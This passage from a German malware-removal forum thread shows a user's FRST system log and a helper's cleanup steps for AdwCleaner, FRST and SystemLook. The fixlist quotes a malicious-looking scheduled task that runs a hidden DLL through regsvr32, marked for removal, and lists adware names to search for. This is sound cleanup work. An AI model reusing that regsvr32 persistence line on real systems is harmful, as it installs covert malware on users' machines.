2017-02-07 18:52 - 2017-02-07 18:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpdsp.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 03243920 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttpph.mdl
2017-02-07 18:52 - 2017-02-07 18:52 - 01544568 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_02451_002\ashttprbl.mdl
2017-05-07 17:13 - 2013-07-04 03:32 - 00936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
2012-01-17 11:24 - 2012-01-17 11:24 - 00055296 _____ () C:\Windows\SysWOW64\ASGT.exe
2017-05-22 18:25 - 2017-05-09 16:38 - 02270672 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 01271096 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
2017-03-18 22:58 - 2017-03-18 22:58 - 00138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2010-07-15 06:44 - 2010-07-15 06:44 - 00020032 _____ () C:\Program Files\Unlocker\UnlockerCOM.dll
2017-03-18 22:59 - 2017-03-20 06:43 - 01731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 02:59 - 2016-09-14 02:59 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 03:00 - 2016-09-14 03:00 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 00074752 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-05-09 21:31 - 2017-05-09 21:31 - 00201728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 43195904 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-05-09 21:31 - 2017-05-09 21:31 - 02457088 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\skypert.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00947512 _____ () C:\Program Files (x86)\ASUS\AI Suite III\ASUSMiniBar.exe
2017-01-22 16:12 - 2013-10-29 14:43 - 00248832 _____ () C:\Program Files (x86)\Drakonia Configurator\hid.exe
2017-01-22 16:12 - 2012-12-11 12:14 - 00240640 _____ () C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
2017-05-02 20:46 - 2017-05-02 20:46 - 00023840 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\de-de\bdsystray.txtui
2017-05-07 17:13 - 2017-05-22 18:29 - 00034448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00147456 _____ () C:\Program Files (x86)\ASUS\AI Suite III\AssistFunc.dll
2015-04-25 07:20 - 2014-10-11 16:52 - 04346368 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\dip4.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00091648 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\Log4cxxWrapper.dll
2015-04-25 07:20 - 2014-09-09 10:14 - 00827392 _____ () C:\Program Files (x86)\ASUS\AI Suite III\Version\Version.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00053248 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Exeio.dll
2015-04-25 07:20 - 2014-10-11 10:57 - 00278528 _____ () C:\Program Files (x86)\ASUS\VGA COM\1.00.20\Vender.dll
2015-04-25 07:19 - 2014-09-09 04:14 - 00662016 _____ () C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMLib.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00711680 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4DIGIPowerControlAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00856576 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4EpuAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00803840 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4FanAction.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00807936 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DIPDLL\DIP4TurboVEVOAction.dll
2015-02-09 16:47 - 2015-02-09 16:47 - 01932800 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Vender.dll
2015-03-09 23:12 - 2015-03-09 23:12 - 00057344 _____ () C:\Program Files (x86)\ASUS\GPU Tweak\Exeio.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00743424 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\EPU.dll
2015-04-25 07:20 - 2014-10-11 16:57 - 00908288 _____ () C:\Program Files (x86)\ASUS\AI Suite III\DIP4\FAN.dll
2015-04-25 07:27 - 2014-09-28 17:59 - 00019872 _____ () C:\Program Files (x86)\Samsung\Samsung Magician\SAMSUNG_SSD.dll
2017-01-22 16:12 - 2013-01-15 18:06 - 00061952 _____ () C:\Program Files (x86)\Drakonia Configurator\HidDevice.dll
2017-01-22 16:12 - 2011-11-22 15:18 - 00249856 _____ () C:\Program Files (x86)\Drakonia Configurator\language.dll
2015-04-25 07:16 - 2013-09-16 12:17 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\Dino\Desktop\AdwCleaner_6.046.exe:BDU [0]
AlternateDataStreams: C:\Users\Dino\Desktop\tdsskiller.exe:BDU [0]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2017-05-22 18:30 - 00000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914389\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914405\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-05222017182914436\Control Panel\Desktop\\Wallpaper -> D:\Dino\Bilder\Wallpaper\Bambus.png
DNS Servers: 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Wiederherstellungspunkte =========================

19-05-2017 15:50:08 Geplanter Prüfpunkt
21-05-2017 20:53:51 Revo Uninstaller's restore point - Spybot - Search & Destroy

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/22/2017 06:29:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0xedc
Startzeit der fehlerhaften Anwendung: 0x01d2d3188f15cdb1
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: b1ad504d-774d-47dc-8091-97f294125cee
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/22/2017 06:28:32 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/22/2017 06:26:47 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/22/2017 06:20:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x19e8
Startzeit der fehlerhaften Anwendung: 0x01d2d317569b506b
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: 87de692b-dc4c-4e2d-8dc3-b2812352807f
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/22/2017 06:14:24 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/22/2017 05:52:25 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/22/2017 05:52:11 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe".
Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden.
Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe".

Error: (05/22/2017 05:49:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x2a84
Startzeit der fehlerhaften Anwendung: 0x01d2d3130a98ef70
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ae5b4a4d-a2c5-431d-ab57-77899d5ecaf4
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/21/2017 08:56:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15
Ausnahmecode: 0xc0000409
Fehleroffset: 0x000eb802
ID des fehlerhaften Prozesses: 0x1ba0
Startzeit der fehlerhaften Anwendung: 0x01d2d263f2a109cb
Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll
Berichtskennung: ae299761-9933-4de1-aba7-7a3113a27840
Vollständiger Name des fehlerhaften Pakets: 
Anwendungs-ID, die relativ zum fehlerhaften Paket ist:

Error: (05/21/2017 08:53:51 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.


Vorgang:
   Generatordaten werden gesammelt

Kontext:
   Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
   Generatorname: System Writer
   Generatorinstanz-ID: {3c5a8c27-ffbd-4938-9377-2dfe4cb6a471}


Systemfehler:
=============
Error: (05/22/2017 06:29:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/22/2017 06:29:18 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT)
Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 und der APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden.

Error: (05/22/2017 06:29:12 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (05/22/2017 06:29:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Anforderung wird nicht unterstützt.

Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (05/22/2017 06:28:43 PM) (Source: DCOM) (EventID: 10005) (User: NT-AUTORITÄT)
Description: Fehler "1115" in DCOM, als der Dienst "TrustedInstaller" mit den Argumenten "Nicht verfügbar" gestartet wurde, um den folgenden Server zu verwenden:
{752073A1-23F2-4396-85F0-8FDB879ED0ED}


CodeIntegrity:
===================================
  Date: 2017-05-22 18:29:14.825
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-05-22 18:21:31.695
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-22 18:21:31.668
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-22 18:20:28.120
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.

  Date: 2017-05-22 18:19:22.798
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00122_013\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-22 17:49:50.871
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-22 17:49:50.840
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 22:54:24.965
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 20:59:59.585
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.

  Date: 2017-05-21 20:59:59.549
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
Prozentuale Nutzung des RAM: 33%
Installierter physikalischer RAM: 8127.12 MB
Verfügbarer physikalischer RAM: 5380.41 MB
Summe virtueller Speicher: 14271.12 MB
Verfügbarer virtueller Speicher: 11342.05 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:237.69 GB) (Free:148.33 GB) NTFS
Drive d: () (Fixed) (Total:931.51 GB) (Free:620.52 GB) NTFS
Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================
         

Alt 22.05.2017, 21:31   #14
M-K-D-B
/// TB-Ausbilder
 
Trojaner, Adware oder sonstiges ? - Standard

Trojaner, Adware oder sonstiges ?



Servus,





Schritt 1
  • Schließe alle offenen Programme und Browser.
  • Starte die adwcleaner.exe mit einem Doppelklick.
  • Klicke auf Werkzeuge > Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • Internet Explorer Richtlinien
    • Chrome Richtlinien
    • Chrome Einstellungen
  • Bestätige die Auswahl mit Ok.
  • Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
  • Klicke nun auf Löschen (auch dann wenn AdwCleaner sagt, dass nichts gefunden wurde) und bestätige auftretende Hinweise mit Ok.
  • Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).





Schritt 2
  • Kopiere den Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    CloseProcesses:
    C:\USERS\DINO\APPDATA\ROAMING\PROFILES
    CMD: type "C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\profiles.ini"
    Task: {03FEE5BC-86DA-4B2F-9EEA-E5CB0C1530A9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Keine Datei <==== ACHTUNG
    Task: {04670283-EDCA-415F-9886-04F65EE28E14} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Keine Datei <==== ACHTUNG
    Task: {1B5AB088-48F6-4D90-ADCE-7CEB2DD014B3} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Keine Datei <==== ACHTUNG
    Task: {30C4F2AB-B9A6-4232-860F-10ADD05E9EA2} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Keine Datei <==== ACHTUNG
    Task: {4E847E30-5E1C-4E48-8586-201A11017D85} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Keine Datei <==== ACHTUNG
    Task: {57EE3E64-10C3-4731-B511-79FE0C97A37A} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Keine Datei <==== ACHTUNG
    Task: {901C65A1-C5C2-4A6E-B3A2-C4E63ABEF28C} - \Optimize Start Menu Cache Files-S-1-5-21-3554052566-3312977812-1675691648-1001 -> Keine Datei <==== ACHTUNG
    Task: {A839842C-D8D3-410F-A730-39BC24C4484E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Keine Datei <==== ACHTUNG
    Task: {AF7B870D-2508-4548-AF95-6776A6BBB9E1} - System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908} => Regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\646f2bbc\1a8cacde.dll" <==== ACHTUNG
    Task: {B74C46F5-BB8A-4B7F-BBB5-19E4A68421FA} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe 
    C:\Windows\AutoKMS
    Task: {C571DD8E-3ED6-476A-BAAE-A345728189FD} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Keine Datei <==== ACHTUNG
    Task: {CFCB07FE-156D-4218-AA2A-AAFD62CF18D7} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Keine Datei <==== ACHTUNG
    Task: {DE695851-C428-40A8-8661-95C82C81093C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Keine Datei <==== ACHTUNG
    Task: {FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Keine Datei <==== ACHTUNG
    CMD: dir "%ProgramFiles%"
    CMD: dir "%ProgramFiles(x86)%"
    CMD: dir "%ProgramData%"
    CMD: dir "%Appdata%"
    CMD: dir "%LocalAppdata%"
    CMD: dir "%CommonProgramFiles(x86)%"
    CMD: dir "%CommonProgramW6432%"
    CMD: dir "%UserProfile%"
    RemoveProxy:
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke den Entfernen Button.
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
Lade dir die passende Version von SystemLook vom folgenden Spiegel herunter und speichere das Tool auf dem Desktop:
SystemLook (32 bit) | SystemLook (64 bit)
  • Doppelklicke auf die SystemLook.exe, um das Tool zu starten.
  • Kopiere den Inhalt der folgenden Codebox in das Textfeld des Tools:

    Code:
    ATTFilter
    :folderfind
    *Note-up*
    *Kuaizip*
    *Microleaves*
    *Noobzo*
    *SearchModule*
    *DPower*
    *BestCleaner*
    *Spark*
    *youndoo.com*
    
    :regfind
    Note-up
    Kuaizip
    Microleaves
    Noobzo
    SearchModule
    DPower
    BestCleaner
    Spark
    youndoo.com
             
  • Klicke nun auf den Button Look, um den Scan zu starten.
  • Der Suchlauf kann einige Zeit dauern.
  • Wenn der Suchlauf beendet ist, wird sich dein Editor mit den Ergebnissen öffnen, poste diese in deinen Thread.
  • Die Ergebnisse werden auch auf dem Desktop als SystemLook.txt gespeichert.







Schritt 3
